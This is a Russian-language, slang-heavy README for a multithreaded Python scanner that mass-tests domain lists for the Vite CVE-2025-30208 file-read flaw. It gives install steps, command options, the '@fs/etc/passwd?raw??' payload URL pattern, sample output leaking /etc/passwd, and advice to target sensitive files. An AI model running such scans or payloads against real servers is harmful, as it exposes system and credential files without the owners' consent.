
CVE-2025-30208 ViteVulnScanner
Йо, это крутой многопоточный Python-скрипт от keklick1337, чтобы охотиться на домены, уязвимые для CVE-2025-30208 в Vite. По сути, он проверяет, можно ли стянуть случайные файлы через эндпоинт @fs с ?raw?? или ?import&raw?? — думай об утечках /etc/passwd и прочей вкуснятине. Тут есть умная фильтрация ложных срабатываний, чтобы не тратить время на фигню, плюс опции настройки вывода результатов.
<head> и <body>, если только не пахнет легитимностью.sourcemappingurl или export default, чтобы подтвердить, что всё пучком.results_good.txt, results_maybe_good.txt, results_bad.txt).-u, если хочешь так.requestsurllib3git clone https://github.com/keklick1337/CVE-2025-30208-ViteVulnScanner.git
cd CVE-2025-30208-ViteVulnScanner
pip install requests urllib3
path_list.txt: Пути для проверки, по одному на строку (например, /etc/passwd).domains.txt: Домены для атаки, по одному на строку (например, example.com).Запускай так:
python3 CVE-2025-30208.py <domains_file> [options]
<domains_file>: Твой список доменов (без файла — нет сканирования, очевидно).-t, --threads: Сколько потоков выпустить (по умолчанию: 10).-p, --protocol: Форсировать http или https, или пропусти, чтобы оба.-u, --urls: Вставить уязвимые URL в вывод.-o, --output: Базовое имя файлов (по умолчанию: results).-f, --format: txt для раздельных файлов или jsonl для одного большого (по умолчанию: txt).python3 CVE-2025-30208.py domains.txt
python3 CVE-2025-30208.py domains.txt -t 20 -u -f jsonl
python3 CVE-2025-30208.py domains.txt -t 5 -p https
-f txt)results_good.txt: Всё, что точно сломано (есть sourcemappingurl или export default).results_maybe_good.txt: Может быть уязвимо, но явных признаков нет.results_bad.txt: Чисто, волноваться не о чем.-u, и URL прилепятся через табуляцию (\t).results_good.txt с -u:example.com https://example.com/@fs/etc/passwd?raw??
-f jsonl)results_good.jsonl, results_maybe_good.jsonl, results_bad.jsonl.domain: Что сканировал.status: VULNERABLE, MAYBE VULNERABLE или BAD.url (если -u): Где всё сломано.response: Что сервер выплюнул.results_good.jsonl:{"domain": "example.com", "status": "VULNERABLE", "url": "https://example.com/@fs/etc/passwd?raw??", "response": "root:x:0:0:root:/root:/bin/bash"}
/1e4c911a3fd2244596863ddbfa6f3600/7970621079b41658dcd6c205640b3602/fake).<head> и <body>, значит, мимо — сервер просто дурит.path_list.txt с @fs/<path>?raw?? и ?import&raw??.<head> и <body>? Пропускаем это.sourcemappingurl или export default? Бух, GOOD.MAYBE_GOOD.BAD.urllib3.disable_warnings()), так что он не ноет по поводу сертификатов. Будь осторожен.path_list.txt под свои цели — чувствительные файлы — это самое то.Слушай сюда: это говно только для образовательных целей, брат. Я не несу ответственности, если ты что-то налажаешь, попадёшься или разозлишь кого-то этим. Используй, чтобы учиться, а не быть мудаком. Все риски на тебе, нахуй — я просто скидываю код.
Есть идеи? Нашёл баг? Долбани мне в Issues или Pull Requests. Больше способов убивать ложные срабатывания или клёвые фичи? Давай сделаем этого зверя ещё круче.